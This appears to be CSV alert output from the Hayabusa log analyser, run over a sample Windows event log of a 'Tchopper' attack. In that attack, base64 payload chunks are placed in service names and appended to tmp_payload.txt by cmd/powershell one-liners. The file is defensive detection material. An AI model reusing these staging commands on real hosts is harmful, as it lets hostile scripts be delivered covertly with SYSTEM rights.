17:17:58.263 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 